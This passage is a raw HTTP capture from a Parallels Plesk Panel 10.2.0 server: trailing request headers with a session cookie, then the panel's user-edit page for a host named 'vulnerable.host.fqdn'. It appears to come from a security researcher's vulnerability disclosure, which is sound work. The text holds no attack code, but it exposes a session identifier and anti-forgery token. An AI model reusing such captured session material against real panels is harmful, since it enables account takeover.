Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:29:11 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:29:11 GMT
Connection: close
Content-Length: 45522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>format-1 - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/user/action-name/edit" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fuser%2Fedit%2Fid%2F4' + '&activeModule=' + 'users' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"active","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/user/list">
<span>Up Level</span>
</a>
</div>
<h2><span><b>format-1</b></span></h2>
</div>
</div>


<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Smb.UserEditForm = Class.create({

initialize: function(config) {

if (!$('general-account-loginString')) {
return;
}

if ($('general-vcard-email-emailType-internal')) {
$('general-vcard-email-emailType-internal').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-internalEmail')) {
$('general-vcard-email-internalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-internalEmail').observe('change', this._generateLogin.bind(this));
}
if ($('general-vcard-email-domain')) {
$('general-vcard-email-domain').observe('change', this._generateLogin.bind(this));
}

if ($('general-vcard-email-emailType-external')) {
$('general-vcard-email-emailType-external').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-externalEmail')) {
$('general-vcard-email-externalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-externalEmail').observe('change', this._generateLogin.bind(this));
}
},

_generateLogin: function() {
if ($('general-vcard-email-emailType-internal') && $('general-vcard-email-emailType-internal').checked) {
var loginString = $('general-vcard-email-internalEmail').value;
if ('' == loginString) {
//empty username
} else
if ($('general-vcard-email-domain')) {
loginString += '@' + $('general-vcard-email-domain').options[$('general-vcard-email-domain').selectedIndex].text;
} else {
loginString += '@' + $('general-vcard-email-internalEmail-domain').innerHTML;
}
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-emailType-external') && $('general-vcard-email-emailType-external').checked) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-externalEmail')) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
}
}
});

Jsw.onReady(function() {
new Smb.UserEditForm();
});
//]]>
</script><form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'></div><script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.bar.Tabs({
type: 'dynamic',
applyTo: 'form-tab-buttons',
items: [{"componentType":"Jsw.bar.Button","title":"General","tabId":"tab-general","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Contact Details","tabId":"tab-contacts","containerCls":""}]
});
});
</script>

<div id='tab-general' >

<div id='general-vcard' class='form-box' >
<div id='general-vcard-content-area'>
<div id='general-vcard-contactName-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-contactName'>Contact name&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="general[vcard][contactName]" id="general-vcard-contactName" value="format-1" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div class="form-row">
<div class='field-name'>
<label for='general-vcard-email-emailType'>E-mail address which is also used as a username for logging in to the Panel&nbsp;</label> <span class="required">*</span>
</div>
<div class="field-value">
<div class="text-value">
<div class="indent-box">

<span><input type="radio" class="radio"
value="internal"
id="general-vcard-email-emailType-internal"
name="general[vcard][email][emailType]"
checked="checked" /></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-internal">Create an e-mail address under your account</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][internalEmail]" id="general-vcard-email-internalEmail" value="fdf080d9224fd0d18957a62c" class="input-text" /> @<span id='general-vcard-email-internalEmail-domain'>vulnerable.host.fqdn</span></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
<div class="indent-box">

<span><input type="radio" class="radio"
value="external"
id="general-vcard-email-emailType-external"
name="general[vcard][email][emailType]"
/></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-external">Use an external e-mail address</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][externalEmail]" id="general-vcard-email-externalEmail" value="fdf080d9224fd0d18957a62c@nosedivesailing.com" class="f-middle-size input-text" disabled="1" /></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Smb.UserEmailForm = Class.create({

initialize: function(config) {
this._prefix = config['prefix'];
this._internalEmailId = this._prefix + config['internalEmailId'];
this._internalEmailElements = config['internalEmailElements'];
this._externalEmailId = this._prefix + config['externalEmailId'];
this._externalEmailElements = config['externalEmailElements'];
$(this._internalEmailId).observe('click', this._internalEmailOnClick.bind(this));
$(this._externalEmailId).observe('click', this._externalEmailOnClick.bind(this));
if ($(this._internalEmailId).checked) {
this._internalEmailOnClick();
} else {
   this._externalEmailOnClick();
}
},

_internalEmailOnClick: function() {
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
},

_externalEmailOnClick: function() {
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
}
});

Jsw.onReady(function() {
new Smb.UserEmailForm({
prefix: 'general-vcard-email-',
internalEmailId: 'emailType-internal',
internalEmailElements: ['internalEmail'
],
externalEmailId: 'emailType-external',
externalEmailElements: ['externalEmail']
});

});
//]]>
</script>


<div id='general-vcard-roleId-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-roleId'>User role&nbsp;</label></div>
<div class='field-value'>

<select name="general[vcard][roleId]" id="general-vcard-roleId">
<option value="5" label="Owner">Owner</option>
<option value="6" label="WebMaster">WebMaster</option>
<option value="7" label="Application User" selected="selected">Application User</option>
<option value="8" label="Accountant">Accountant</option>
</select>
<span class='field-errors' style="display:none;"></span>
<span class="hint">User roles grant users administrative privileges and access to applications that you selected for the role.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'General Information',
applyTo: 'general-vcard'
});
});
//]]>
</script>


<div id='general-account' class='form-box' >
<div id='general-account-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-account-loginString'>Username&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-account-loginString'>fdf080d9224fd0d18957a62c@vulnerable.host.fqdn</span>

</div>
</div>
</div>
<div id='general-account-password-form-row' class='form-row' >
<div class='field-name'><label for='general-account-password'>Password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][password]" id="general-account-password" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-account-password');
new Jsw.PasswordMeter({
renderTo: 'general-account-password',
renderMode: 'after',
observe: 'general-account-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-account-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-account-passwordConfirmation'>Confirm password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>

<div class='form-row'>
<div class='single-row'>
<div class='indent-box'>

<input type="hidden" name="general[account][isActive]" value="0" /><input type="checkbox" name="general[account][isActive]" id="general-account-isActive" value="1" checked="checked" class="checkbox" />
<div class='indent-box-content'>
<label for='general-account-isActive'>User is active&nbsp;</label>
<span class="hint">Active users can access the Panel.</span>
</div>
</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'Panel Preferences',
applyTo: 'general-account'
});
});
//]]>
</script>
</div>
<div id='tab-contacts' style="display: none;">

<div id='contacts-contactsSection' class='form-box' >
<div id='contacts-contactsSection-content-area'>
<div id='contacts-contactsSection-companyName-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-companyName'>Company name&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][companyName]" id="contacts-contactsSection-companyName" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-phone-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-phone'>Phone number&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][phone]" id="contacts-contactsSection-phone" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-fax-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-fax'>Fax number&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][fax]" id="contacts-contactsSection-fax" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-address-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-address'>Address&nbsp;</label></div>
<div class='field-value'>

<textarea name="contacts[contactsSection][address]" id="contacts-contactsSection-address" class="f-middle-size" rows="4" cols="80"></textarea>
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-city-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-city'>City&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][city]" id="contacts-contactsSection-city" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-state-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-state'>State or province&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][state]" id="contacts-contactsSection-state" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-zip-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-zip'>Postal or ZIP code&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][zip]" id="contacts-contactsSection-zip" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-country-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-country'>Country&nbsp;</label></div>
<div class='field-value'>

<select name="contacts[contactsSection][country]" id="contacts-contactsSection-country">
<option value="AF" label="Afghanistan">Afghanistan</option>
<option value="AX" label="..land Islands">..land Islands</option>
<option value="AL" label="Albania">Albania</option>
<option value="DZ" label="Algeria">Algeria</option>
<option value="AS" label="American Samoa">American Samoa</option>
<option value="AD" label="Andorra">Andorra</option>
<option value="AO" label="Angola">Angola</option>
<option value="AI" label="Anguilla">Anguilla</option>
<option value="AQ" label="Antarctica">Antarctica</option>
<option value="AG" label="Antigua and Barbuda">Antigua and Barbuda</option>
<option value="AR" label="Argentina">Argentina</option>
<option value="AM" label="Armenia">Armenia</option>
<option value="AW" label="Aruba">Aruba</option>
<option value="AU" label="Australia">Australia</option>
<option value="AT" label="Austria">Austria</option>
<option value="AZ" label="Azerbaijan">Azerbaijan</option>
<option value="BS" label="Bahamas">Bahamas</option>
<option value="BH" label="Bahrain">Bahrain</option>
<option value="BD" label="Bangladesh">Bangladesh</option>
<option value="BB" label="Barbados">Barbados</option>
<option value="BY" label="Belarus">Belarus</option>
<option value="BE" label="Belgium">Belgium</option>
<option value="BZ" label="Belize">Belize</option>
<option value="BJ" label="Benin">Benin</option>
<option value="BM" label="Bermuda">Bermuda</option>
<option value="BT" label="Bhutan">Bhutan</option>
<option value="BO" label="Bolivia, Plurinational State of">Bolivia, Plurinational State of</option>
<option value="BA" label="Bosnia and Herzegovina">Bosnia and Herzegovina</option>
<option value="BW" label="Botswana">Botswana</option>
<option value="BV" label="Bouvet Island">Bouvet Island</option>
<option value="BR" label="Brazil">Brazil</option>
<option value="IO" label="British Indian Ocean Territory">British Indian Ocean Territory</option>
<option value="BN" label="Brunei Darussalam">Brunei Darussalam</option>
<option value="BG" label="Bulgaria">Bulgaria</option>
<option value="BF" label="Burkina Faso">Burkina Faso</option>
<option value="BI" label="Burundi">Burundi</option>
<option value="KH" label="Cambodia">Cambodia</option>
<option value="CM" label="Cameroon">Cameroon</option>
<option value="CA" label="Canada">Canada</option>
<option value="CV" label="Cape Verde">Cape Verde</option>
<option value="KY" label="Cayman Islands">Cayman Islands</option>
<option value="CF" label="Central African Republic">Central African Republic</option>
<option value="TD" label="Chad">Chad</option>
<option value="CL" label="Chile">Chile</option>
<option value="CN" label="China">China</option>
<option value="CX" label="Christmas Island">Christmas Island</option>
<option value="CC" label="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option>
<option value="CO" label="Colombia">Colombia</option>
<option value="KM" label="Comoros">Comoros</option>
<option value="CG" label="Congo">Congo</option>
<option value="CD" label="Congo, the Democratic Republic of the">Congo, the Democratic Republic of the</option>
<option value="CK" label="Cook Islands">Cook Islands</option>
<option value="CR" label="Costa Rica">Costa Rica</option>
<option value="CI" label="Cote D'Ivoire">Cote D'Ivoire</option>
<option value="HR" label="Croatia">Croatia</option>
<option value="CU" label="Cuba">Cuba</option>
<option value="CY" label="Cyprus">Cyprus</option>
<option value="CZ" label="Czech Republic">Czech Republic</option>
<option value="DK" label="Denmark">Denmark</option>
<option value="DJ" label="Djibouti">Djibouti</option>
<option value="DM" label="Dominica">Dominica</option>
<option value="DO" label="Dominican Republic">Dominican Republic</option>
<option value="EC" label="Ecuador">Ecuador</option>
<option value="EG" label="Egypt">Egypt</option>
<option value="SV" label="El Salvador">El Salvador</option>
<option value="GQ" label="Equatorial Guinea">Equatorial Guinea</option>
<option value="ER" label="Eritrea">Eritrea</option>
<option value="EE" label="Estonia">Estonia</option>
<option value="ET" label="Ethiopia">Ethiopia</option>
<option value="FK" label="Falkland Islands (Malvinas)">Falkland Islands (Malvinas)</option>
<option value="FO" label="Faroe Islands">Faroe Islands</option>
<option value="FJ" label="Fiji">Fiji</option>
<option value="FI" label="Finland">Finland</option>
<option value="FR" label="France">France</option>
<option value="GF" label="French Guiana">French Guiana</option>
<option value="PF" label="French Polynesia">French Polynesia</option>
<option value="TF" label="French Southern Territories">French Southern Territories</option>
<option value="GA" label="Gabon">Gabon</option>
<option value="GM" label="Gambia">Gambia</option>
<option value="GE" label="Georgia">Georgia</option>
<option value="DE" label="Germany">Germany</option>
<option value="GH" label="Ghana">Ghana</option>
<option value="GI" label="Gibraltar">Gibraltar</option>
<option value="GR" label="Greece">Greece</option>
<option value="GL" label="Greenland">Greenland</option>
<option value="GD" label="Grenada">Grenada</option>
<option value="GP" label="Guadeloupe">Guadeloupe</option>
<option value="GU" label="Guam">Guam</option>
<option value="GT" label="Guatemala">Guatemala</option>
<option value="GG" label="Guernsey">Guernsey</option>
<option value="GN" label="Guinea">Guinea</option>
<option value="GW" label="Guinea-Bissau">Guinea-Bissau</option>
<option value="GY" label="Guyana">Guyana</option>
<option value="HT" label="Haiti">Haiti</option>
<option value="HM" label="Heard Island and McDonald Islands">Heard Island and McDonald Islands</option>
<option value="VA" label="Holy See (Vatican City State)">Holy See (Vatican City State)</option>
<option value="HN" label="Honduras">Honduras</option>
<option value="HK" label="Hong Kong">Hong Kong</option>
<option value="HU" label="Hungary">Hungary</option>
<option value="IS" label="Iceland">Iceland</option>
<option value="IN" label="India">India</option>
<option value="ID" label="Indonesia">Indonesia</option>
<option value="IR" label="Iran, Islamic Republic of">Iran, Islamic Republic of</option>
<option value="IQ" label="Iraq">Iraq</option>
<option value="IE" label="Ireland">Ireland</option>
<option value="IM" label="Isle of Man">Isle of Man</option>
<option value="IL" label="Israel">Israel</option>
<option value="IT" label="Italy">Italy</option>
<option value="JM" label="Jamaica">Jamaica</option>
<option value="JP" label="Japan">Japan</option>
<option value="JE" label="Jersey">Jersey</option>
<option value="JO" label="Jordan">Jordan</option>
<option value="KZ" label="Kazakhstan">Kazakhstan</option>
<option value="KE" label="Kenya">Kenya</option>
<option value="KI" label="Kiribati">Kiribati</option>
<option value="KP" label="Korea, Democratic People's Republic of">Korea, Democratic People's Republic of</option>
<option value="KR" label="Korea, Republic of">Korea, Republic of</option>
<option value="KW" label="Kuwait">Kuwait</option>
<option value="KG" label="Kyrgyzstan">Kyrgyzstan</option>
<option value="LA" label="Lao People's Democratic Republic">Lao People's Democratic Republic</option>
<option value="LV" label="Latvia">Latvia</option>
<option value="LB" label="Lebanon">Lebanon</option>
<option value="LS" label="Lesotho">Lesotho</option>
<option value="LR" label="Liberia">Liberia</option>
<option value="LY" label="Libyan Arab Jamahiriya">Libyan Arab Jamahiriya</option>
<option value="LI" label="Liechtenstein">Liechtenstein</option>
<option value="LT" label="Lithuania">Lithuania</option>
<option value="LU" label="Luxembourg">Luxembourg</option>
<option value="MO" label="Macao">Macao</option>
<option value="MK" label="Macedonia, the Former Yugoslav Republic of">Macedonia, the Former Yugoslav Republic of</option>
<option value="MG" label="Madagascar">Madagascar</option>
<option value="MW" label="Malawi">Malawi</option>
<option value="MY" label="Malaysia">Malaysia</option>
<option value="MV" label="Maldives">Maldives</option>
<option value="ML" label="Mali">Mali</option>
<option value="MT" label="Malta">Malta</option>
<option value="MH" label="Marshall Islands">Marshall Islands</option>
<option value="MQ" label="Martinique">Martinique</option>
<option value="MR" label="Mauritania">Mauritania</option>
<option value="MU" label="Mauritius">Mauritius</option>
<option value="YT" label="Mayotte">Mayotte</option>
<option value="MX" label="Mexico">Mexico</option>
<option value="FM" label="Micronesia, Federated States of">Micronesia, Federated States of</option>
<option value="MD" label="Moldova, Republic of">Moldova, Republic of</option>
<option value="MC" label="Monaco">Monaco</option>
<option value="MN" label="Mongolia">Mongolia</option>
<option value="ME" label="Montenegro">Montenegro</option>
<option value="MS" label="Montserrat">Montserrat</option>
<option value="MA" label="Morocco">Morocco</option>
<option value="MZ" label="Mozambique">Mozambique</option>
<option value="MM" label="Myanmar">Myanmar</option>
<option value="NA" label="Namibia">Namibia</option>
<option value="NR" label="Nauru">Nauru</option>
<option value="NP" label="Nepal">Nepal</option>
<option value="NL" label="Netherlands">Netherlands</option>
<option value="AN" label="Netherlands Antilles">Netherlands Antilles</option>
<option value="NC" label="New Caledonia">New Caledonia</option>
<option value="NZ" label="New Zealand">New Zealand</option>
<option value="NI" label="Nicaragua">Nicaragua</option>
<option value="NE" label="Niger">Niger</option>
<option value="NG" label="Nigeria">Nigeria</option>
<option value="NU" label="Niue">Niue</option>
<option value="NF" label="Norfolk Island">Norfolk Island</option>
<option value="MP" label="Northern Mariana Islands">Northern Mariana Islands</option>
<option value="NO" label="Norway">Norway</option>
<option value="OM" label="Oman">Oman</option>
<option value="PK" label="Pakistan">Pakistan</option>
<option value="PW" label="Palau">Palau</option>
<option value="PS" label="Palestinian Territory, Occupied">Palestinian Territory, Occupied</option>
<option value="PA" label="Panama">Panama</option>
<option value="PG" label="Papua New Guinea">Papua New Guinea</option>
<option value="PY" label="Paraguay">Paraguay</option>
<option value="PE" label="Peru">Peru</option>
<option value="PH" label="Philippines">Philippines</option>
<option value="PN" label="Pitcairn">Pitcairn</option>
<option value="PL" label="Poland">Poland</option>
<option value="PT" label="Portugal">Portugal</option>
<option value="PR" label="Puerto Rico">Puerto Rico</option>
<option value="QA" label="Qatar">Qatar</option>
<option value="RE" label="Reunion">Reunion</option>
<option value="RO" label="Romania">Romania</option>
<option value="RU" label="Russian Federation">Russian Federation</option>
<option value="RW" label="Rwanda">Rwanda</option>
<option value="BL" label="Saint Barthelemy">Saint Barthelemy</option>
<option value="SH" label="Saint Helena, Ascension and Tristan da Cunha">Saint Helena, Ascension and Tristan da Cunha</option>
<option value="KN" label="Saint Kitts and Nevis">Saint Kitts and Nevis</option>
<option value="LC" label="Saint Lucia">Saint Lucia</option>
<option value="MF" label="Saint Martin">Saint Martin</option>
<option value="PM" label="Saint Pierre and Miquelon">Saint Pierre and Miquelon</option>
<option value="VC" label="Saint Vincent and the Grenadines">Saint Vincent and the Grenadines</option>
<option value="WS" label="Samoa">Samoa</option>
<option value="SM" label="San Marino">San Marino</option>
<option value="ST" label="Sao Tome and Principe">Sao Tome and Principe</option>
<option value="SA" label="Saudi Arabia">Saudi Arabia</option>
<option value="SN" label="Senegal">Senegal</option>
<option value="RS" label="Serbia">Serbia</option>
<option value="SC" label="Seychelles">Seychelles</option>
<option value="SL" label="Sierra Leone">Sierra Leone</option>
<option value="SG" label="Singapore">Singapore</option>
<option value="SK" label="Slovakia">Slovakia</option>
<option value="SI" label="Slovenia">Slovenia</option>
<option value="SB" label="Solomon Islands">Solomon Islands</option>
<option value="SO" label="Somalia">Somalia</option>
<option value="ZA" label="South Africa">South Africa</option>
<option value="GS" label="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option>
<option value="ES" label="Spain">Spain</option>
<option value="LK" label="Sri Lanka">Sri Lanka</option>
<option value="SD" label="Sudan">Sudan</option>
<option value="SR" label="Suriname">Suriname</option>
<option value="SJ" label="Svalbard and Jan Mayen">Svalbard and Jan Mayen</option>
<option value="SZ" label="Swaziland">Swaziland</option>
<option value="SE" label="Sweden">Sweden</option>
<option value="CH" label="Switzerland">Switzerland</option>
<option value="SY" label="Syrian Arab Republic">Syrian Arab Republic</option>
<option value="TW" label="Taiwan">Taiwan</option>
<option value="TJ" label="Tajikistan">Tajikistan</option>
<option value="TZ" label="Tanzania, United Republic of">Tanzania, United Republic of</option>
<option value="TH" label="Thailand">Thailand</option>
<option value="TL" label="Timor-Leste">Timor-Leste</option>
<option value="TG" label="Togo">Togo</option>
<option value="TK" label="Tokelau">Tokelau</option>
<option value="TO" label="Tonga">Tonga</option>
<option value="TT" label="Trinidad and Tobago">Trinidad and Tobago</option>
<option value="TN" label="Tunisia">Tunisia</option>
<option value="TR" label="Turkey">Turkey</option>
<option value="TM" label="Turkmenistan">Turkmenistan</option>
<option value="TC" label="Turks and Caicos Islands">Turks and Caicos Islands</option>
<option value="TV" label="Tuvalu">Tuvalu</option>
<option value="UG" label="Uganda">Uganda</option>
<option value="UA" label="Ukraine">Ukraine</option>
<option value="AE" label="United Arab Emirates">United Arab Emirates</option>
<option value="GB" label="United Kingdom">United Kingdom</option>
<option value="US" label="United States" selected="selected">United States</option>
<option value="UM" label="United States Minor Outlying Islands">United States Minor Outlying Islands</option>
<option value="UY" label="Uruguay">Uruguay</option>
<option value="UZ" label="Uzbekistan">Uzbekistan</option>
<option value="VU" label="Vanuatu">Vanuatu</option>
<option value="VE" label="Venezuela, Bolivarian Republic of">Venezuela, Bolivarian Republic of</option>
<option value="VN" label="Viet Nam">Viet Nam</option>
<option value="VG" label="Virgin Islands, British">Virgin Islands, British</option>
<option value="VI" label="Virgin Islands, U.S.">Virgin Islands, U.S.</option>
<option value="WF" label="Wallis and Futuna">Wallis and Futuna</option>
<option value="EH" label="Western Sahara">Western Sahara</option>
<option value="YE" label="Yemen">Yemen</option>
<option value="ZM" label="Zambia">Zambia</option>
<option value="ZW" label="Zimbabwe">Zimbabwe</option>
</select>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'contacts-contactsSection'
});
});
//]]>
</script>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
